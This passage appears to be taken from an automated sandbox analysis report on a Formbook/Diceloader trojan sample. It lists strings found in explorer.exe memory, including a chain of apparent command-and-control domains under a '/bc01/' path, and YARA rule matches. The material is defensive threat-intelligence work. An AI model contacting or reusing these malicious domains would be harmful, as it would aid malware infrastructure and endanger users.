Source: explorer.exe, 00000006.00000002.2810433780.0000000006F09000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.ajabandot.websiteReferer:
Source: explorer.exe, 00000006.00000002.2810433780.0000000006F09000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.aming-chair-83359.bond
Source: explorer.exe, 00000006.00000002.2810433780.0000000006F09000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.aming-chair-83359.bond/bc01/
Source: explorer.exe, 00000006.00000002.2810433780.0000000006F09000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.aming-chair-83359.bond/bc01/www.refabricated-homes-74404.bond
Source: explorer.exe, 00000006.00000002.2810433780.0000000006F09000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.aming-chair-83359.bondReferer:
Source: explorer.exe, 00000006.00000002.2810433780.0000000006F09000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.avada-casino-tlj.buzz
Source: explorer.exe, 00000006.00000002.2810433780.0000000006F09000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.avada-casino-tlj.buzz/bc01/
Source: explorer.exe, 00000006.00000002.2810433780.0000000006F09000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.avada-casino-tlj.buzz/bc01/www.olocaustaffirmer.net
Source: explorer.exe, 00000006.00000002.2810433780.0000000006F09000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.avada-casino-tlj.buzzReferer:
Source: explorer.exe, 00000006.00000002.2810433780.0000000006F09000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.eals.lat
Source: explorer.exe, 00000006.00000002.2810433780.0000000006F09000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.eals.lat/bc01/
Source: explorer.exe, 00000006.00000002.2810433780.0000000006F09000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.eals.lat/bc01/www.ajabandot.website
Source: explorer.exe, 00000006.00000002.2810433780.0000000006F09000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.eals.latReferer:
Source: explorer.exe, 00000006.00000002.2810433780.0000000006F09000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.ewferg.top
Source: explorer.exe, 00000006.00000002.2810433780.0000000006F09000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.ewferg.top/bc01/
Source: explorer.exe, 00000006.00000002.2810433780.0000000006F09000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.ewferg.top/bc01/www.52cy67sk.bond
Source: explorer.exe, 00000006.00000002.2810433780.0000000006F09000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.ewferg.topReferer:
Source: explorer.exe, 00000006.00000002.2810433780.0000000006F09000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.irmag.online
Source: explorer.exe, 00000006.00000002.2810433780.0000000006F09000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.irmag.online/bc01/
Source: explorer.exe, 00000006.00000002.2810433780.0000000006F09000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.irmag.online/bc01/www.eals.lat
Source: explorer.exe, 00000006.00000002.2810433780.0000000006F09000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.irmag.onlineReferer:
Source: explorer.exe, 00000006.00000002.2810433780.0000000006F09000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.lkjuy.xyz
Source: explorer.exe, 00000006.00000002.2810433780.0000000006F09000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.lkjuy.xyz/bc01/
Source: explorer.exe, 00000006.00000002.2810433780.0000000006F09000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.lkjuy.xyz/bc01/www.ewferg.top
          Source: explorer.exe, 00000006.00000002.2810433780.0000000006F09000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.lkjuy.xyzReferer:
          Source: explorer.exe, 00000006.00000000.1569063480.0000000009237000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.2817331144.0000000009237000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.c
          Source: explorer.exe, 00000006.00000002.2810433780.0000000006F09000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.nline-degree-6987776.world
          Source: explorer.exe, 00000006.00000002.2810433780.0000000006F09000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.nline-degree-6987776.world/bc01/
          Source: explorer.exe, 00000006.00000002.2810433780.0000000006F09000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.nline-degree-6987776.world/bc01/www.ntercash24-cad.homes
          Source: explorer.exe, 00000006.00000002.2810433780.0000000006F09000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.nline-degree-6987776.worldReferer:
          Source: explorer.exe, 00000006.00000002.2810433780.0000000006F09000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.ntercash24-cad.homes
          Source: explorer.exe, 00000006.00000002.2810433780.0000000006F09000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.ntercash24-cad.homes/bc01/
          Source: explorer.exe, 00000006.00000002.2810433780.0000000006F09000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.ntercash24-cad.homes/bc01/www.irmag.online
          Source: explorer.exe, 00000006.00000002.2810433780.0000000006F09000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.ntercash24-cad.homesReferer:
          Source: explorer.exe, 00000006.00000002.2810433780.0000000006F09000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.obs-for-seniors-39582.bond
          Source: explorer.exe, 00000006.00000002.2810433780.0000000006F09000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.obs-for-seniors-39582.bond/bc01/
          Source: explorer.exe, 00000006.00000002.2810433780.0000000006F09000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.obs-for-seniors-39582.bond/bc01/www.oko.events
          Source: explorer.exe, 00000006.00000002.2810433780.0000000006F09000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.obs-for-seniors-39582.bondReferer:
          Source: explorer.exe, 00000006.00000002.2810433780.0000000006F09000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.oko.events
          Source: explorer.exe, 00000006.00000002.2810433780.0000000006F09000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.oko.events/bc01/
          Source: explorer.exe, 00000006.00000002.2810433780.0000000006F09000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.oko.events/bc01/www.aming-chair-83359.bond
          Source: explorer.exe, 00000006.00000002.2810433780.0000000006F09000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.oko.eventsReferer:
          Source: explorer.exe, 00000006.00000002.2810433780.0000000006F09000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.olocaustaffirmer.net
          Source: explorer.exe, 00000006.00000002.2810433780.0000000006F09000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.olocaustaffirmer.net/bc01/
          Source: explorer.exe, 00000006.00000002.2810433780.0000000006F09000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.olocaustaffirmer.net/bc01/www.lkjuy.xyz
          Source: explorer.exe, 00000006.00000002.2810433780.0000000006F09000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.olocaustaffirmer.netReferer:
          Source: explorer.exe, 00000006.00000002.2810433780.0000000006F09000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.refabricated-homes-74404.bond
          Source: explorer.exe, 00000006.00000002.2810433780.0000000006F09000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.refabricated-homes-74404.bond/bc01/
          Source: explorer.exe, 00000006.00000002.2810433780.0000000006F09000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.refabricated-homes-74404.bond/bc01/www.nline-degree-6987776.world
          Source: explorer.exe, 00000006.00000002.2810433780.0000000006F09000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.refabricated-homes-74404.bondReferer:
          Source: explorer.exe, 00000006.00000002.2810433780.0000000006F09000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.y-language-menu.net
          Source: explorer.exe, 00000006.00000002.2810433780.0000000006F09000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.y-language-menu.net/bc01/
          Source: explorer.exe, 00000006.00000002.2810433780.0000000006F09000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.y-language-menu.net/bc01/www.avada-casino-tlj.buzz
          Source: explorer.exe, 00000006.00000002.2810433780.0000000006F09000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.y-language-menu.netReferer:
          Source: explorer.exe, 00000006.00000002.2821414398.000000000BCA0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1583309348.000000000BC80000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://activity.windows.com/UserActivity.ReadWrite.CreatedByApp
          Source: explorer.exe, 00000006.00000002.2821414398.000000000BCA0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1583309348.000000000BC80000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://android.notify.windows.com/iOS
          Source: explorer.exe, 00000006.00000002.2821414398.000000000BCA0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1583309348.000000000BC80000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://android.notify.windows.com/iOSA4
          Source: explorer.exe, 00000006.00000002.2821414398.000000000BCA0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1583309348.000000000BC80000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://android.notify.windows.com/iOSd
          Source: explorer.exe, 00000006.00000002.2810433780.000000000702D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1561995150.000000000702D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/
          Source: explorer.exe, 00000006.00000002.2810433780.0000000006F09000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=wind
          Source: explorer.exe, 00000006.00000002.2817331144.00000000090DA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1569063480.00000000090DA000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?
          Source: explorer.exe, 00000006.00000000.1561995150.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.2810433780.0000000006F09000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?activityId=0E948A694F8C48079B908C8EA9DDF9EA&timeOut=5000&oc
          Source: explorer.exe, 00000006.00000000.1569063480.00000000091FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1561995150.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.2817331144.00000000091FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.2810433780.0000000006F09000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com:443/v1/news/Feed/Windows?
          Source: explorer.exe, 00000006.00000000.1569063480.00000000091FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.2817331144.00000000091FB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://arc.msn.com
          Source: explorer.exe, 00000006.00000002.2810433780.0000000006F09000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earnings
          Source: explorer.exe, 00000006.00000002.2810433780.0000000006F09000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/MostlyClearNight.svg
          Source: explorer.exe, 00000006.00000000.1561995150.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.2810433780.0000000006F09000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Teaser/recordhigh.svg
          Source: explorer.exe, 00000006.00000000.1561995150.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.2810433780.0000000006F09000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/taskbar/animation/WeatherInsights/WeatherInsi
          Source: explorer.exe, 00000006.00000000.1561995150.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.2810433780.0000000006F09000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV
          Source: explorer.exe, 00000006.00000000.1561995150.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.2810433780.0000000006F09000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV-dark
          Source: explorer.exe, 00000006.00000000.1561995150.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.2810433780.0000000006F09000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13fcaT
          Source: explorer.exe, 00000006.00000000.1561995150.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.2810433780.0000000006F09000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13fcaT-dark
          Source: explorer.exe, 00000006.00000000.1561995150.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.2810433780.0000000006F09000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gF9k
          Source: explorer.exe, 00000006.00000000.1561995150.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.2810433780.0000000006F09000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gF9k-dark
          Source: explorer.exe, 00000006.00000000.1561995150.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.2810433780.0000000006F09000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gKBA
          Source: explorer.exe, 00000006.00000000.1561995150.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.2810433780.0000000006F09000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gKBA-dark
          Source: explorer.exe, 00000006.00000000.1583309348.000000000BBB0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.2821414398.000000000BBB0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://excel.office.com
          Source: explorer.exe, 00000006.00000000.1561995150.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.2810433780.0000000006F09000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA11f7Wa.img
          Source: explorer.exe, 00000006.00000000.1561995150.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.2810433780.0000000006F09000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA15Yat4.img
          Source: explorer.exe, 00000006.00000000.1561995150.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.2810433780.0000000006F09000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA1b2aMG.img
          Source: explorer.exe, 00000006.00000000.1561995150.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.2810433780.0000000006F09000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA1bjET8.img
          Source: explorer.exe, 00000006.00000000.1561995150.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.2810433780.0000000006F09000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA1hGNsX.img
          Source: explorer.exe, 00000006.00000000.1561995150.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.2810433780.0000000006F09000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAT0qC2.img
          Source: explorer.exe, 00000006.00000000.1561995150.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.2810433780.0000000006F09000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBNvr53.img
          Source: explorer.exe, 00000006.00000000.1561995150.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.2810433780.0000000006F09000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBYTL1i.img
          Source: explorer.exe, 00000006.00000002.2823132896.000000000C0FD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2286118045.000000000C12C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1584952319.000000000C12D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://java.B
          Source: explorer.exe, 00000006.00000000.1583309348.000000000BBB0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.2821414398.000000000BBB0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://outlook.com
          Source: explorer.exe, 00000006.00000000.1583309348.000000000BBB0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.2821414398.000000000BBB0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://powerpoint.office.comer
          Source: explorer.exe, 00000006.00000000.1561995150.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.2810433780.0000000006F09000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://upload.wikimedia.org/wikipedia/commons/thumb/8/84/Zealandia-Continent_map_en.svg/1870px-Zeal
          Source: explorer.exe, 00000006.00000000.1561995150.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.2810433780.0000000006F09000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNew
          Source: explorer.exe, 00000006.00000000.1561995150.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.2810433780.0000000006F09000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNew
          Source: explorer.exe, 00000006.00000000.1583309348.000000000BDF5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.2821414398.000000000BDF5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://wns.windows.com/EM0
          Source: explorer.exe, 00000006.00000000.1583309348.000000000BBB0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.2821414398.000000000BBB0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://word.office.com48
          Source: explorer.exe, 00000006.00000000.1561995150.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.2810433780.0000000006F09000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/money/careersandeducation/student-loan-debt-forgiveness-arrives-for-some-b
          Source: explorer.exe, 00000006.00000000.1561995150.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.2810433780.0000000006F09000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/money/markets/costco-is-seeing-a-gold-rush-what-s-behind-the-demand-for-it
          Source: explorer.exe, 00000006.00000000.1561995150.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.2810433780.0000000006F09000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/money/personalfinance/the-big-3-mistakes-financial-advisors-say-that-the-1
          Source: explorer.exe, 00000006.00000000.1561995150.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.2810433780.0000000006F09000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/money/personalfinance/the-no-1-phrase-people-who-are-good-at-small-talk-al
          Source: explorer.exe, 00000006.00000000.1561995150.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.2810433780.0000000006F09000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/politics/kinzinger-has-theory-about-who-next-house-speaker-will-be/vi
          Source: explorer.exe, 00000006.00000000.1561995150.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.2810433780.0000000006F09000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/us/dumb-and-dumber-12-states-with-the-absolute-worst-education-in-the
          Source: explorer.exe, 00000006.00000000.1561995150.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.2810433780.0000000006F09000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/sports/other/predicting-what-the-pac-12-would-look-like-after-expansion-wi
          Source: explorer.exe, 00000006.00000000.1561995150.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.2810433780.0000000006F09000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/sports/other/simone-biles-leads-u-s-women-s-team-to-seventh-straight-world
          Source: explorer.exe, 00000006.00000000.1561995150.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.2810433780.0000000006F09000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/sports/other/washington-state-ad-asks-ncaa-for-compassion-and-understandin
          Source: explorer.exe, 00000006.00000000.1561995150.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.2810433780.0000000006F09000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/weather/topstories/accuweather-el-ni
          Source: explorer.exe, 00000006.00000000.1561995150.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.2810433780.0000000006F09000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/weather/topstories/first-map-of-earth-s-lost-continent-has-been-published/
          Source: explorer.exe, 00000006.00000000.1561995150.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.2810433780.0000000006F09000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/weather/topstories/stop-planting-new-forests-scientists-say/ar-AA1hFI09
          Source: explorer.exe, 00000006.00000000.1561995150.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.2810433780.0000000006F09000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/weather/topstories/us-winter-forecast-for-the-2023-2024-season/ar-AA1hGINt
          Source: explorer.exe, 00000006.00000000.1561995150.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.2810433780.0000000006F09000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com:443/en-us/feed
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 8_2_007C96C1 LoadImageW,memset,GetObjectW,LoadImageW,memset,GetObjectW,LoadImageW,memset,GetObjectW,GetClientRect,GetWindowDC,CreateCompatibleBitmap,CreateCompatibleDC,CreateCompatibleDC,SelectPalette,SelectPalette,RealizePalette,SelectObject,SelectObject,BitBlt,SelectObject,SelectObject,StretchBlt,SelectObject,SelectObject,BitBlt,SelectObject,GetSystemMetrics,GetSystemMetrics,DrawIconEx,SelectObject,SelectPalette,SelectPalette,DeleteDC,DeleteDC,ReleaseDC,GetLastError,DeleteObject,DeleteObject,DeleteObject,DeleteObject,8_2_007C96C1

          E-Banking Fraud

          Source: Yara match | File source: 4.2.TEKL#U0130F #U0130ST.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 4.2.TEKL#U0130F #U0130ST.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 0.2.TEKL#U0130F #U0130ST.exe.4baf778.1.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 00000004.00000002.1623354480.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000000.00000002.1554836023.0000000004189000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000008.00000002.2806521590.00000000048D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000008.00000002.2805964645.00000000029B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000008.00000002.2806583506.0000000004900000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000000.00000002.1554836023.00000000049DD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

          System Summary

          Source: 4.2.TEKL#U0130F #U0130ST.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Diceloader_15eeb7b9 Author: unknown
          Source: 4.2.TEKL#U0130F #U0130ST.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 4.2.TEKL#U0130F #U0130ST.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 4.2.TEKL#U0130F #U0130ST.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 4.2.TEKL#U0130F #U0130ST.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Diceloader_15eeb7b9 Author: unknown
          Source: 4.2.TEKL#U0130F #U0130ST.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 4.2.TEKL#U0130F #U0130ST.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 4.2.TEKL#U0130F #U0130ST.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0.2.TEKL#U0130F #U0130ST.exe.4baf778.1.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Diceloader_15eeb7b9 Author: unknown
          Source: 0.2.TEKL#U0130F #U0130ST.exe.4baf778.1.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 0.2.TEKL#U0130F #U0130ST.exe.4baf778.1.raw.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0.2.TEKL#U0130F #U0130ST.exe.4baf778.1.raw.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000004.00000002.1623354480.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Diceloader_15eeb7b9 Author: unknown
          Source: 00000004.00000002.1623354480.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000004.00000002.1623354480.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000004.00000002.1623354480.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000000.00000002.1554836023.0000000004189000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Diceloader_15eeb7b9 Author: unknown
          Source: 00000000.00000002.1554836023.0000000004189000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
